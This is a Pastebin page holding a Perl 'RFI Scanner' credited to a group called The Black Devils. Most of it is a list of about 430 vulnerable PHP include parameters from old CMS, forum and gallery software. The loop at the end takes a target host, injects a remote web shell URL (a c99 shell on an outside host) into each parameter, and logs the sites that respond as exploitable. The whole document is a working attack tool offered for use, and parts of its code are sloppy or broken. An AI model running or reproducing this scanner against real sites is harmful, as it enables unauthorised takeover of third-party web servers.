API tools faq
paste
Advertisement
Googleinurl

RFI Scanner Ver 1.0.0 Perl By The Black Devils By Asesino04

Googleinurl
Sep 2nd, 2013
877
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 22.68 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  3. #0     _                   __           __       __                     1
  4. #1   /' \            __  /'__`\        /\ \__  /'__`\                   0
  5. #0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  6. #1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
  7. #0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  8. #1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
  9. #0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  10. #1                  \ \____/ >> Exploit database separated by exploit   0
  11. #0                   \/___/          type (local, remote, DoS, etc.)    1
  12. #1                                                                      1
  13. #0  [+] Site            : 1337day.com                                   0
  14. #1  [+] Support e-mail  : submit[at]1337day.com                         1
  15. #0                                                                      0
  16. #1               #########################################              1
  17. #0               I'm The Black Devils member from Inj3ct0r Team         1
  18. #1               #########################################              0
  19. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  20.  
  21.     use HTTP::Request;
  22.     use LWP::UserAgent;
  23.  
  24. # Scan a host from Remote File Include vulnerability
  25. # by The Black Devils
  26. use HTTP::Request;
  27. use LWP::UserAgent;
  28.  
  29. system("title The Black Devils");
  30. system("color 1e");
  31. system ("cls");
  32.  
  33. print "    |=======================================================|\n";
  34. # print "    |= [!] Name : RFI Scanner Ver 1.0.0 Perl               =|\n";
  35. print "    |= [!] Author  : The Black Devils                      =|\n";
  36. print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
  37. print "    |=======================================================|\n";
  38.  
  39. print "\n Insert host:(ex: http://www.site.com/)\n";
  40. $host=<STDIN>;
  41. chomp($host);
  42. print "Ok lets scan..\n";
  43. $rfi1="includes/header.php?systempath=";
  44. $rfi2="Gallery/displayCategory.php?basepath=";
  45. $rfi3="index.inc.php?PATH_Includes=";
  46. $rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
  47. $rfi5="include/db.php?GLOBALS[rootdp]=";
  48. $rfi6="ashnews.php?pathtoashnews=";
  49. $rfi7="ashheadlines.php?pathtoashnews=";
  50. $rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  51. $rfi9="demo/includes/init.php?user_inc=";
  52. $rfi10="jaf/index.php?show=";
  53. $rfi11="inc/shows.inc.php?cutepath=";
  54. $rfi12="poll/admin/common.inc.php?base_path=";
  55. $rfi13="pollvote/pollvote.php?pollname=";
  56. $rfi14="sources/post.php?fil_config=";
  57. $rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
  58. $rfi16="bb_lib/checkdb.inc.php?libpach=";
  59. $rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
  60. $rfi18="index.php?from_market=Y&pageurl=";
  61. $rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  62. $rfi20="pivot/modules/module_db.php?pivot_path=";
  63. $rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
  64. $rfi22="derniers_commentaires.php?rep=";
  65. $rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
  66. $rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  67. $rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
  68. $rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
  69. $rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
  70. $rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
  71. $rfi30="myPHPCalendar/admin.php?cal_dir=";
  72. $rfi31="agendax/addevent.inc.php?agendax_path=";
  73. $rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  74. $rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
  75. $rfi34="main.php?page=";
  76. $rfi35="default.php?page=";
  77. $rfi36="index.php?action=";
  78. $rfi37="index1.php?p=";
  79. $rfi38="index2.php?x=";
  80. $rfi39="index2.php?content=";
  81. $rfi40="index.php?conteudo=";
  82. $rfi41="index.php?cat=";
  83. $rfi42="include/new-visitor.inc.php?lvc_include_dir=";
  84. $rfi43="modules/agendax/addevent.inc.php?agendax_path=";
  85. $rfi44="shoutbox/expanded.php?conf=";
  86. $rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  87. $rfi46="pivot/modules/module_db.php?pivot_path=";
  88. $rfi47="library/editor/editor.php?root=";
  89. $rfi48="library/lib.php?root=";
  90. $rfi49="e107/e107_handlers/secure_img_render.php?p=";
  91. $rfi50="zentrack/index.php?configFile=";
  92. $rfi51="main.php?x=";
  93. $rfi52="becommunity/community/index.php?pageurl=";
  94. $rfi53="GradeMap/index.php?page=";
  95. $rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
  96. $rfi55="calendar/calendar.php?serverPath=";
  97. $rfi56="calendar/functions/popup.php?serverPath=";
  98. $rfi57="calendar/events/header.inc.php?serverPath=";
  99. $rfi58="calendar/events/datePicker.php?serverPath=";
  100. $rfi59="calendar/setup/setupSQL.php?serverPath=";
  101. $rfi60="calendar/setup/header.inc.php?serverPath=";
  102. $rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
  103. $rfi62="zentrack/index.php?configFile=";
  104. $rfi63="pivot/modules/module_db.php?pivot_path=";
  105. $rfi64="inc/header.php/step_one.php?server_inc=";
  106. $rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
  107. $rfi66="inc/pipe.php?HCL_path=";
  108. $rfi67="include/write.php?dir=";
  109. $rfi68="include/new-visitor.inc.php?lvc_include_dir=";
  110. $rfi69="includes/header.php?systempath=";
  111. $rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
  112. $rfi71="coppercop/theme.php?THEME_DIR=";
  113. $rfi72="zentrack/index.php?configFile=";
  114. $rfi73="pivot/modules/module_db.php?pivot_path=";
  115. $rfi74="inc/header.php/step_one.php?server_inc=";
  116. $rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
  117. $rfi76="inc/pipe.php?HCL_path=";
  118. $rfi77="include/write.php?dir=";
  119. $rfi78="include/new-visitor.inc.php?lvc_include_dir=";
  120. $rfi79="includes/header.php?systempath=";
  121. $rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
  122. $rfi81="coppercop/theme.php?THEME_DIR=";
  123. $rfi82="becommunity/community/index.php?pageurl=";
  124. $rfi83="shoutbox/expanded.php?conf=";
  125. $rfi84="agendax/addevent.inc.php?agendax_path=";
  126. $rfi85="myPHPCalendar/admin.php?cal_dir=";
  127. $rfi86="yabbse/Sources/Packages.php?sourcedir=";
  128. $rfi87="dotproject/modules/projects/addedit.php?root_dir=";
  129. $rfi88="dotproject/modules/projects/view.php?root_dir=";
  130. $rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
  131. $rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
  132. $rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
  133. $rfi92="My_eGallery/public/displayCategory.php?basepath=";
  134. $rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
  135. $rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
  136. $rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
  137. $rfi96="modules/agendax/addevent.inc.php?agendax_path=";
  138. $rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
  139. $rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  140. $rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  141. $rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  142. $rfi101="shoutbox/expanded.php?conf=";
  143. $rfi102="pivot/modules/module_db.php?pivot_path=";
  144. $rfi103="library/editor/editor.php?root=";
  145. $rfi104="library/lib.php?root=";
  146. $rfi105="e107/e107_handlers/secure_img_render.php?p=";
  147. $rfi106="main.php?x=";
  148. $rfi107="main.php?page=";
  149. $rfi108="index.php?meio.php=";
  150. $rfi109="index.php?include=";
  151. $rfi110="index.php?inc=";
  152. $rfi111="index.php?page=";
  153. $rfi112="index.php?pag=";
  154. $rfi113="index.php?p=";
  155. $rfi114="index.php?x=";
  156. $rfi115="index.php?open=";
  157. $rfi116="index.php?visualizar=";
  158. $rfi117="index.php?pagina=";
  159. $rfi118="index2.php?content=";
  160. $rfi119="inc/step_one_tables.php?server_inc=";
  161. $rfi120="GradeMap/index.php?page=";
  162. $rfi121="phpshop/index.php?base_dir=";
  163. $rfi122="admin.php?cal_dir=";
  164. $rfi123="contacts.php?cal_dir=";
  165. $rfi124="convert-date.php?cal_dir=";
  166. $rfi125="album_portal.php?phpbb_root_path=";
  167. $rfi126="mainfile.php?MAIN_PATH=";
  168. $rfi127="dotproject/modules/files/index_table.php?root_dir=";
  169. $rfi128="html/affich.php?base=";
  170. $rfi129="gallery/init.php?HTTP_POST_VARS=";
  171. $rfi130="pm/lib.inc.php?pm_path=";
  172. $rfi131="ideabox/include.php?gorumDir=";
  173. $rfi132="index2.php?includes_dir=";
  174. $rfi133="forums/toplist.php?phpbb_root_path=";
  175. $rfi134="forum/toplist.php?phpbb_root_path=";
  176. $rfi135="admin/config_settings.tpl.php?include_path=";
  177. $rfi136="include/common.php?include_path=";
  178. $rfi137="event/index.php?page=";
  179. $rfi138="forum/index.php?includeFooter=";
  180. $rfi139="forums/index.php?includeFooter=";
  181. $rfi140="forum/bb_admin.php?includeFooter=";
  182. $rfi141="forums/bb_admin.php?includeFooter=";
  183. $rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
  184. $rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
  185. $rfi144="blend_data/blend_common.php?phpbb_root_path=";
  186. $rfi145="master.php?root_path=";
  187. $rfi146="includes/kb_constants.php?module_root_path=";
  188. $rfi147="forum/includes/kb_constants.php?module_root_path=";
  189. $rfi148="forums/includes/kb_constants.php?module_root_path=";
  190. $rfi149="classes/adodbt/sql.php?classes_dir=";
  191. $rfi150="agenda.php3?rootagenda=";
  192. $rfi151="agenda2.php3?rootagenda=";
  193. $rfi152="sources/lostpw.php?CONFIG[path]=";
  194. $rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
  195. $rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
  196. $rfi155="sources/join.php?CONFIG[path]=";
  197. $rfi156="topsites/sources/join.php?CONFIG[path]=";
  198. $rfi157="toplist/sources/join.php?CONFIG[path]=";
  199. $rfi158="topsite/sources/join.php?CONFIG[path]=";
  200. $rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
  201. $rfi160="extras/poll/poll.php?file_newsportal=";
  202. $rfi161="index.php?site_path=";
  203. $rfi162="mail/index.php?site_path=";
  204. $rfi163="fclick/show.php?path=";
  205. $rfi164="show.php?path=";
  206. $rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
  207. $rfi166="eshow.php?Config_rootdir=";
  208. $rfi167="auction/auction_common.php?phpbb_root_path=";
  209. $rfi168="index.php?inc_dir=";
  210. $rfi169="calendar/index.php?inc_dir=";
  211. $rfi170="modules/TotalCalendar/index.php?inc_dir=";
  212. $rfi171="modules/calendar/index.php?inc_dir=";
  213. $rfi172="calendar/embed/day.php?path=";
  214. $rfi173="ACalendar/embed/day.php?path=";
  215. $rfi174="calendar/add_event.php?inc_dir=";
  216. $rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
  217. $rfi176="claroline/auth/ldap/authldap.php?includePath=";
  218. $rfi177="docebo/modules/credits/help.php?lang=";
  219. $rfi178="modules/credits/help.php?lang=";
  220. $rfi179="config.php?returnpath=";
  221. $rfi180="editsite.php?returnpath=";
  222. $rfi181="in.php?returnpath=";
  223. $rfi182="addsite.php?returnpath=";
  224. $rfi183="includes/pafiledb_constants.php?module_root_path=";
  225. $rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
  226. $rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
  227. $rfi186="auth/auth.php?phpbb_root_path=";
  228. $rfi187="auth/auth_phpbb/phpbb_root_path=";
  229. $rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
  230. $rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
  231. $rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
  232. $rfi191="phpdig/includes/config.php?relative_script_path=";
  233. $rfi192="includes/phpdig/includes/config.php?relative_script_path=";
  234. $rfi193="includes/dbal.php?eqdkp_root_path=";
  235. $rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
  236. $rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
  237. $rfi196="include/SQuery/gameSpy2.php?libpath=";
  238. $rfi197="include/global.php?GLOBALS[includeBit]=";
  239. $rfi198="topsites/config.php?returnpath=";
  240. $rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
  241. $rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
  242. $rfi201="forum/addpost_newpoll.php?thispath=";
  243. $rfi202="forums/addpost_newpoll.php?thispath=";
  244. $rfi203="ubbthreads/ubbt.inc.php?thispath=";
  245. $rfi204="forums/ubbt.inc.php?thispath=";
  246. $rfi205="forum/ubbt.inc.php?thispath=";
  247. $rfi206="forum/admin/addentry.php?phpbb_root_path=";
  248. $rfi207="admin/addentry.php?phpbb_root_path=";
  249. $rfi208="index.php?f=";
  250. $rfi209="index.php?act=";
  251. $rfi210="ipchat.php?root_path=";
  252. $rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
  253. $rfi212="stats.php?dir[func]=dir[base]=";
  254. $rfi213="ladder/stats.php?dir[base]=";
  255. $rfi214="ladders/stats.php?dir[base]=";
  256. $rfi215="sphider/admin/configset.php?settings_dir=";
  257. $rfi216="admin/configset.php?settings_dir=";
  258. $rfi217="vwar/admin/admin.php?vwar_root=";
  259. $rfi218="modules/vwar/admin/admin.php?vwar_root=";
  260. $rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
  261. $rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
  262. $rfi221="sphider/admin/configset.php?settings_dir=";
  263. $rfi222="admin/configset.php?settings_dir=";
  264. $rfi223="impex/ImpExData.php?systempath=";
  265. $rfi224="forum/impex/ImpExData.php?systempath=";
  266. $rfi225="forums/impex/ImpExData.php?systempath=";
  267. $rfi226="application.php?base_path=";
  268. $rfi227="index.php?theme_path=";
  269. $rfi228="become_editor.php?theme_path=";
  270. $rfi229="add.php?theme_path=";
  271. $rfi230="bad_link.php?theme_path=";
  272. $rfi231="browse.php?theme_path=";
  273. $rfi232="detail.php?theme_path=";
  274. $rfi233="fav.php?theme_path=";
  275. $rfi234="get_rated.php?theme_path=";
  276. $rfi235="login.php?theme_path=";
  277. $rfi236="mailing_list.php?theme_path=";
  278. $rfi237="new.php?theme_path=";
  279. $rfi238="modify.php?theme_path=";
  280. $rfi239="pick.php?theme_path=";
  281. $rfi240="power_search.php?theme_path=";
  282. $rfi241="rating.php?theme_path=";
  283. $rfi242="register.php?theme_path=";
  284. $rfi243="review.php?theme_path=";
  285. $rfi244="rss.php?theme_path=";
  286. $rfi245="search.php?theme_path=";
  287. $rfi246="send_pwd.php?theme_path=";
  288. $rfi247="sendmail.php?theme_path=";
  289. $rfi248="tell_friend.php?theme_path=";
  290. $rfi249="top_rated.php?theme_path=";
  291. $rfi250="user_detail.php?theme_path=";
  292. $rfi251="user_search.php?theme_path=";
  293. $rfi252="invoice.php?base_path=";
  294. $rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
  295. $rfi254="cgi-bin/install/index.php?G_PATH=";
  296. $rfi255="cgi-bin/include/print_category.php?dir=";
  297. $rfi256="includes/class_template.php?quezza_root_path=";
  298. $rfi257="bazar/classified_right.php?language_dir=";
  299. $rfi258="classified_right.php?language_dir=";
  300. $rfi259="phpBazar/classified_right.php?language_dir=";
  301. $rfi260="chat/messagesL.php3?cmd=";
  302. $rfi261="phpMyChat/chat/messagesL.php3?cmd=";
  303. $rfi262="bbs/include/write.php?dir=";
  304. $rfi263="visitorupload.php?cmd=";
  305. $rfi264="modules/center/admin/accounts/process.php?module_path]=";
  306. $rfi265="index.php?template=";
  307. $rfi266="armygame.php?libpath=";
  308. $rfi267="lire.php?rub=";
  309. $rfi268="pathofhostadmin/?page=";
  310. $rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
  311. $rfi270="index.php?req_path=";
  312. $rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
  313. $rfi272="Farsi1/index.php?archive=";
  314. $rfi273="index.php?archive=";
  315. $rfi274="show_archives.php?template=";
  316. $rfi275="forum/include/common.php?pun_root=";
  317. $rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
  318. $rfi277="vuln.php?=";
  319. $rfi278="cgi-bin//include/write.php?dir=";
  320. $rfi279="admin/common.inc.php?basepath=";
  321. $rfi280="pm/lib.inc.php?sfx=";
  322. $rfi281="pm/lib.inc.php?pm_path=";
  323. $rfi282="artmedic-kleinanzeigen-path/index.php?id=";
  324. $rfi283="osticket/include/main.php?include_dir=";
  325. $rfi284="include/main.php?config[search_disp]=include_dir=";
  326. $rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
  327. $rfi286="quick_reply.php?phpbb_root_path=";
  328. $rfi287="zboard/include/write.php?dir=";
  329. $rfi288="admin/plog-admin-functions.php?configbasedir=";
  330. $rfi289="content.php?content=";
  331. $rfi290="q-news.php?id=";
  332. $rfi291="_conf/core/common-tpl-vars.php?confdir=";
  333. $rfi292="votebox.php?VoteBoxPath=";
  334. $rfi293="al_initialize.php?alpath=";
  335. $rfi294="include/db.php?GLOBALS[rootdp]=";
  336. $rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
  337. $rfi296="protection.php?siteurl=";
  338. $rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
  339. $rfi298="index2.php?includes_dir=";
  340. $rfi299="classes.php?LOCAL_PATH=";
  341. $rfi300="extensions/moblog/moblog_lib.php?basedir=";
  342. $rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
  343. $rfi302="phpWebLog/include/init.inc.php?G_PATH=";
  344. $rfi303="admin/objects.inc.php4?Server=";
  345. $rfi304="trg_news30/trgnews/install/article.php?dir=";
  346. $rfi305="block.php?Include=";
  347. $rfi306="arpuivo.php?data=";
  348. $rfi307="setup/index.php?GALLERY_BASEDIR=";
  349. $rfi308="include/help.php?base=";
  350. $rfi309="index.php?[Home]=";
  351. $rfi310="block.php?Include=";
  352. $rfi311="examples/phonebook.php?page=";
  353. $rfi312="PHPNews/auth.php?path=";
  354. $rfi313="include/print_category.php?dir=";
  355. $rfi314="skin/zero_vote/login.php?dir=";
  356. $rfi315="skin/zero_vote/setup.php?dir=";
  357. $rfi316="skin/zero_vote/ask_password.php?dir=";
  358. $rfi317="gui/include/sql.php?include_path=";
  359. $rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
  360. $rfi319="email.php?login=cer_skin=";
  361. $rfi320="PhotoGal/ops/gals.php?news_file=";
  362. $rfi321="index.php?custom=";
  363. $rfi322="loginout.php?cutepath=";
  364. $rfi323="oneadmin/config.php?path[docroot]=";
  365. $rfi324="xcomic/initialize.php?xcomicRootPath=";
  366. $rfi325="skin/zero_vote/setup.php?dir=";
  367. $rfi326="skin/zero_vote/error.php? dir=";
  368. $rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
  369. $rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
  370. $rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
  371. $rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
  372. $rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
  373. $rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
  374. $rfi333="src/index_overview.inc.php?config[path_src_include]=";
  375. $rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
  376. $rfi335="src/index_image.inc.php?config[path_src_include]=";
  377. $rfi336="src/image-gd.class.php?config[path_src_include]=";
  378. $rfi337="src/image.class.php?config[path_src_include]=";
  379. $rfi338="src/album.class.php?config[path_src_include]=";
  380. $rfi339="src/show_random.inc.php?config[path_src_include]=";
  381. $rfi340="src/main.inc.php?config[path_src_include]=";
  382. $rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
  383. $rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
  384. $rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
  385. $rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
  386. $rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
  387. $rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
  388. $rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
  389. $rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
  390. $rfi349="src/index_overview.inc.php?config[path_src_include]=";
  391. $rfi350="src/image-gd.class.php?config[path_src_include]=";
  392. $rfi351="src/image.class.php?config[image_module]=";
  393. $rfi352="src/album.class.php?config[path_src_include]=";
  394. $rfi353="src/show_random.inc.php?config[path_src_include]=";
  395. $rfi353="src/main.inc.php?config[path_src_include]=";
  396. $rfi354="includes/db_adodb.php?baseDir=";
  397. $rfi355="includes/db_connect.php?baseDir=";
  398. $rfi356="includes/session.php?baseDir=";
  399. $rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
  400. $rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
  401. $rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
  402. $rfi360="modules/admin/vw_usr_roles.php?baseDir=";
  403. $rfi361="modules/public/calendar.php?baseDir=";
  404. $rfi362="modules/public/date_format.php?baseDir=";
  405. $rfi363="modules/tasks/gantt.php?baseDir=";
  406. $rfi364="mantis/login_page.php?g_meta_include_file=";
  407. $rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
  408. $rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
  409. $rfi367="dotproject/modules/files/index_table.php?root_dir=";
  410. $rfi368="nukebrowser.php?filnavn=";
  411. $rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
  412. $rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
  413. $rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
  414. $rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  415. $rfi373="includes/calendar.php?phpc_root_path=";
  416. $rfi374="includes/setup.php?phpc_root_path=";
  417. $rfi375="phpBB/admin/admin_styles.php?mode=";
  418. $rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
  419. $rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
  420. $rfi378="inc/pipe.php?HCL_path=";
  421. $rfi379="include/write.php?dir=";
  422. $rfi380="becommunity/community/index.php?pageurl=";
  423. $rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
  424. $rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  425. $rfi383="modules/agendax/addevent.inc.php?agendax_path=";
  426. $rfi384="shoutbox/expanded.php?conf=";
  427. $rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  428. $rfi386="index.php?page=";
  429. $rfi387="index.php?pag=";
  430. $rfi388="index.php?include=";
  431. $rfi389="index.php?content=";
  432. $rfi390="index.php?cont=";
  433. $rfi391="index.php?c=";
  434. $rfi392="modules/My_eGallery/index.php?basepath=";
  435. $rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
  436. $rfi394="journal.php?m=";
  437. $rfi395="index.php?m=";
  438. $rfi396="links.php?c=";
  439. $rfi397="forums.php?m=";
  440. $rfi398="list.php?c=";
  441. $rfi399="user.php?xoops_redirect=";
  442. $rfi400="index.php?id=";
  443. $rfi401="r.php?url=";
  444. $rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
  445. $rfi403="inc/formmail.inc.php?script_root=";
  446. $rfi404="include/init.inc.php?G_PATH=";
  447. $rfi405="backend/addons/links/index.php?PATH=";
  448. $rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
  449. $rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
  450. $rfi408="protection.php?siteurl=";
  451. $rfi409="htmltonuke.php?filnavn=";
  452. $rfi410="mail_autocheck.php?pm_path=";
  453. $rfi411="index.php?p=";
  454. $rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
  455. $rfi413="e107/e107_handlers/secure_img_render.php?p=";
  456. $rfi414="include/new-visitor.inc.php?lvc_include_dir=";
  457. $rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
  458. $rfi416="library/editor/editor.php?root=";
  459. $rfi417="library/lib.php?root=";
  460. $rfi418="zentrack/index.php?configFile=";
  461. $rfi419="pivot/modules/module_db.php?pivot_path=";
  462. $rfi420="myPHPCalendar/admin.php?cal_dir=";
  463. $rfi421="index.php/main.php?x=";
  464. $rfi422="os/pointer.php?url=";
  465. $rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
  466. $rfi424="db.php?path_local=";
  467. $rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
  468. $rfi426="index.php?kietu[url_hit]=";
  469. $rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
  470. $rfi428="Sources/Packages.php?sourcedir=";
  471. $rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
  472. $rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
  473.  
  474. $int = $values[ rand(4) ];
  475. for($int=1;$int<430;$int++){
  476. @shelllink="http://c99.gen.tr/c99.txt?";
  477. $lol="rfi";
  478. $asd=$lol.$int;
  479. $url2="http://".$host."/".$$asd."@shelllink?";
  480. my $req=HTTP::Request->new(GET=>$url2);
  481. my $ua=LWP::UserAgent->new();
  482. $ua->timeout(10);
  483. my $response=$ua->request($req);
  484. if ($response->is_success) {
  485. if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
  486. open(FILE,">>file.txt");
  487. print FILE "$url2\n";
  488. close(FILE);
  489. print "$url2 is vulnerable..\n";
  490. }}
  491. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!